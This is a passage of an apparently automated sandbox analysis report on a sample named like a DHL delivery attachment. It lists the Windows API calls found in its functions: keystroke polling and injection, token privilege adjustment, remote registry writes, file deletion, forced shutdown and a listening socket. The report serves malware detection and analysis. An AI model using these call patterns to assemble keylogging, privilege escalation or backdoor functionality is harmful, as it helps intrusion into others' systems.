                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C3D6BF
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C3D6C7
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C3D6CF
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D6D2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D6E7
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D6F2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D6FC
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D701
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D70A
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D70F
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D719
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D71E
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D721
                                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00C3D748
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: 80ebd872f46805fa5cf82b6ae1cd6fa78b8ee611feeb55a0cd82406d20f1face
                                                                                        • Instruction ID: 1c84de8516c2b608f9298edd6bf660a9b39c4fc6071aba0de608aa485352d4d3
                                                                                        • Opcode Fuzzy Hash: 80ebd872f46805fa5cf82b6ae1cd6fa78b8ee611feeb55a0cd82406d20f1face
                                                                                        • Instruction Fuzzy Hash: EA319471A50318BBEB206F619C4AF7F7F6CEB44B50F104039FA05EA1D1D6B05D51ABA4
                                                                                        APIs
                                                                                          • Part of subcall function 00C587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                          • Part of subcall function 00C587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                          • Part of subcall function 00C587E1: GetLastError.KERNEL32 ref: 00C58865
                                                                                        • _memset.LIBCMT ref: 00C58353
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C583A5
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C583B6
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C583CD
                                                                                        • GetProcessWindowStation.USER32 ref: 00C583E6
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00C583F0
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C5840A
                                                                                          • Part of subcall function 00C581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C58309), ref: 00C581E0
                                                                                          • Part of subcall function 00C581CB: CloseHandle.KERNEL32(?,?,00C58309), ref: 00C581F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: ebc3e5460288c8111774f54391318faf37d234cc1b905d6df7a3d91d02888bce
                                                                                        • Instruction ID: 8fa318a74e0d3f35291590d4f4bafdbfd3df2f71fbbaae28a7c0ba7f972f9e38
                                                                                        • Opcode Fuzzy Hash: ebc3e5460288c8111774f54391318faf37d234cc1b905d6df7a3d91d02888bce
                                                                                        • Instruction Fuzzy Hash: B4815B75900209AFEF119FA4DC45AEE7B78EF08305F144169FD24B6161EB318E9DEB28
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C6C78D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6C7E1
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6C806
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6C81D
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C6C844
                                                                                        • __swprintf.LIBCMT ref: 00C6C890
                                                                                        • __swprintf.LIBCMT ref: 00C6C8D3
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • __swprintf.LIBCMT ref: 00C6C927
                                                                                          • Part of subcall function 00C23698: __woutput_l.LIBCMT ref: 00C236F1
                                                                                        • __swprintf.LIBCMT ref: 00C6C975
                                                                                          • Part of subcall function 00C23698: __flsbuf.LIBCMT ref: 00C23713
                                                                                          • Part of subcall function 00C23698: __flsbuf.LIBCMT ref: 00C2372B
                                                                                        • __swprintf.LIBCMT ref: 00C6C9C4
                                                                                        • __swprintf.LIBCMT ref: 00C6CA13
                                                                                        • __swprintf.LIBCMT ref: 00C6CA62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        • Opcode ID: 8c3388d478829e16bf9a53e34b560173972da4831c47233d8488476c07e5fcde
                                                                                        • Instruction ID: 1008654e397af281ceb562dc74572a867e719cead7b80af6d99d802755f37418
                                                                                        • Opcode Fuzzy Hash: 8c3388d478829e16bf9a53e34b560173972da4831c47233d8488476c07e5fcde
                                                                                        • Instruction Fuzzy Hash: 84A12EB1408344ABC714EFA4C885EAFB7ECFF98704F404929F595C7192EA35DA09DB62
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C6EFB6
                                                                                        • _wcscmp.LIBCMT ref: 00C6EFCB
                                                                                        • _wcscmp.LIBCMT ref: 00C6EFE2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C6EFF4
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00C6F00E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C6F026
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F031
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6F04D
                                                                                        • _wcscmp.LIBCMT ref: 00C6F074
                                                                                        • _wcscmp.LIBCMT ref: 00C6F08B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6F09D
                                                                                        • SetCurrentDirectoryW.KERNEL32(00CB8920), ref: 00C6F0BB
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6F0C5
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F0D2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F0E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: cb360a64739eb9f51f9434eb38c5df6300d52f44e971f161f6993b36f788c5f1
                                                                                        • Instruction ID: 8e413c5f24fcc3f7d5f0e781e2fd0d98b24a4d9107bcea9388ee352063052f9f
                                                                                        • Opcode Fuzzy Hash: cb360a64739eb9f51f9434eb38c5df6300d52f44e971f161f6993b36f788c5f1
                                                                                        • Instruction Fuzzy Hash: 2531D5325012196BDF24EFB4EC89BEE77AC9F48360F10017AE914D20A1DB70DB46DB65
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C80953
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8F910,00000000,?,00000000,?,?), ref: 00C809C1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C80A09
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C80A92
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00C80DB2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C80DBF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 22ec6ddd987ca620f906435cb8776e86aedce5b7192833164839a977cc6713ce
                                                                                        • Instruction ID: 11eaacd5664102d3d9c90fb2c93f77262f0eb4cc06ac87a004e4a10923071df8
                                                                                        • Opcode Fuzzy Hash: 22ec6ddd987ca620f906435cb8776e86aedce5b7192833164839a977cc6713ce
                                                                                        • Instruction Fuzzy Hash: 42029C756046019FCB54EF24C881E2AB7E4FF89324F14856DF89A9B3A2CB30ED45DB85
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C6F113
• _wcscmp.LIBCMT ref: 00C6F128
• _wcscmp.LIBCMT ref: 00C6F13F
  • Part of subcall function 00C64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C643A0
• FindNextFileW.KERNEL32(00000000,?), ref: 00C6F16E
• FindClose.KERNEL32(00000000), ref: 00C6F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 00C6F195
• _wcscmp.LIBCMT ref: 00C6F1BC
• _wcscmp.LIBCMT ref: 00C6F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C6F1E5
• SetCurrentDirectoryW.KERNEL32(00CB8920), ref: 00C6F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6F20D
• FindClose.KERNEL32(00000000), ref: 00C6F21A
• FindClose.KERNEL32(00000000), ref: 00C6F22C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 857575287a4324fc41fc7afc5ae058b7f9849ebdf20c75ef41cbc7ffa30fd53f
• Instruction ID: 3f008372bea5a91989c9d2fc6fd0f610fed073088f27110579a2a84677b5d7b9
• Opcode Fuzzy Hash: 857575287a4324fc41fc7afc5ae058b7f9849ebdf20c75ef41cbc7ffa30fd53f
• Instruction Fuzzy Hash: 80319036500219AADF24AFA4FC99BEE77AC9F45360F100179E914E21A0DB70DF46DF68
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C6A20F
• __swprintf.LIBCMT ref: 00C6A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00C6A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C6A293
• _memset.LIBCMT ref: 00C6A2B2
• _wcsncpy.LIBCMT ref: 00C6A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C6A323
• CloseHandle.KERNEL32(00000000), ref: 00C6A32E
• RemoveDirectoryW.KERNEL32(?), ref: 00C6A337
• CloseHandle.KERNEL32(00000000), ref: 00C6A341
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: c620cfc39468577dc8f2764319785dbbb53f66b43a6b9aa68cadadb1a35938db
• Instruction ID: 856620df4b231c45e620e7606810eda5eab091af015d257156a0f7cbd1c7a9ea
• Opcode Fuzzy Hash: c620cfc39468577dc8f2764319785dbbb53f66b43a6b9aa68cadadb1a35938db
• Instruction Fuzzy Hash: 9E318F71500119ABDB219FA0DC89FEF77BCEF88741F1041BAF519E2160EA7097458B25
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
• Opcode ID: 9ae57853421f4b5bbe89effe3c062be6f783fe542def3984ff252a9ac4952e3a
• Instruction ID: 576c503ae2e75503a585ae4a1bebc97cc8ff55543acd62e531a0cd956b4aa6c2
• Opcode Fuzzy Hash: 9ae57853421f4b5bbe89effe3c062be6f783fe542def3984ff252a9ac4952e3a
• Instruction Fuzzy Hash: 6B728EB5E00219DBDB14CF59C8907EEB7B5FF49310F14816AEC19EB290EB309A85DB94
APIs
• GetKeyboardState.USER32(?), ref: 00C60097
• SetKeyboardState.USER32(?), ref: 00C60102
• GetAsyncKeyState.USER32(000000A0), ref: 00C60122
• GetKeyState.USER32(000000A0), ref: 00C60139
• GetAsyncKeyState.USER32(000000A1), ref: 00C60168
• GetKeyState.USER32(000000A1), ref: 00C60179
• GetAsyncKeyState.USER32(00000011), ref: 00C601A5
• GetKeyState.USER32(00000011), ref: 00C601B3
• GetAsyncKeyState.USER32(00000012), ref: 00C601DC
• GetKeyState.USER32(00000012), ref: 00C601EA
• GetAsyncKeyState.USER32(0000005B), ref: 00C60213
• GetKeyState.USER32(0000005B), ref: 00C60221
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 00fe1018c3a25b4598d35930d9d2139dbf8d87b6daac1f5c2ccaf697f7e75f5b
• Instruction ID: ba5e395e09c3e130992ccf9b81880cb9f957a178ed2664d669573cc1996089c6
• Opcode Fuzzy Hash: 00fe1018c3a25b4598d35930d9d2139dbf8d87b6daac1f5c2ccaf697f7e75f5b
• Instruction Fuzzy Hash: CF51D93090478829FB35DBA088957EFBFB49F12380F18459ED9D2665C3DAA49B8CC761
APIs
  • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C804AC
  • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
  • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C8054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C805E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C80822
• RegCloseKey.ADVAPI32(00000000), ref: 00C8082F
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 6a78561eff0a839d51488291060d9ac248187b8e3eeae13115bc01c2973dd9f4
• Instruction ID: 84617fdeee239cf12ee0984dc50b8a6733a5a6e9d45b9b64a5e44ec31b016a4d
• Opcode Fuzzy Hash: 6a78561eff0a839d51488291060d9ac248187b8e3eeae13115bc01c2973dd9f4
• Instruction Fuzzy Hash: B8E16F71604200AFCB54EF24C891E2ABBE4FF89314F14856DF85ADB2A2DB30ED45DB95
APIs
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 387d3e0423a26030e111f682dfaeb5e278f899a7a6ac67813cb90a23128ae30d
• Instruction ID: 92874dc3f818031ff4fe2fea9429882e39f1d6da7edd14884ed9f913a1574c8a
• Opcode Fuzzy Hash: 387d3e0423a26030e111f682dfaeb5e278f899a7a6ac67813cb90a23128ae30d
• Instruction Fuzzy Hash: A221B2752002109FDB14AF64EC19B6D7BA8FF04711F11C129F94ADB2A2DB30AD41CB58
APIs
  • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
  • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
• FindFirstFileW.KERNEL32(?,?), ref: 00C638A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C6394B
• MoveFileW.KERNEL32(?,?), ref: 00C6395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C6397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C639B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: da7a744d7c47e5a9d015aca376f56d96b3357d29d641be0b964cabb4a3580647
• Instruction ID: a841ba953dd843ec675bcd9f2306764cbb9c373bad0e8c5fc2cc98bfa4f6455a
• Opcode Fuzzy Hash: da7a744d7c47e5a9d015aca376f56d96b3357d29d641be0b964cabb4a3580647
• Instruction Fuzzy Hash: B0517F3180518DAACF19EBA0D9929EEB779AF14304F600169F416B71D2EF316F09EF60
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C6F440
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00C6F470
                                                                                        • _wcscmp.LIBCMT ref: 00C6F484
                                                                                        • _wcscmp.LIBCMT ref: 00C6F49F
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00C6F53D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F553
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 713712311-438819550
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        APIs
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                          • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C63B89
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C63BD9
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C63BEA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C63C01
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C63C0A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2649000838-1173974218
                                                                                        APIs
                                                                                          • Part of subcall function 00C587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                          • Part of subcall function 00C587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                          • Part of subcall function 00C587E1: GetLastError.KERNEL32 ref: 00C58865
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00C651F9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C762DC
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C762EB
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C76307
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00C76316
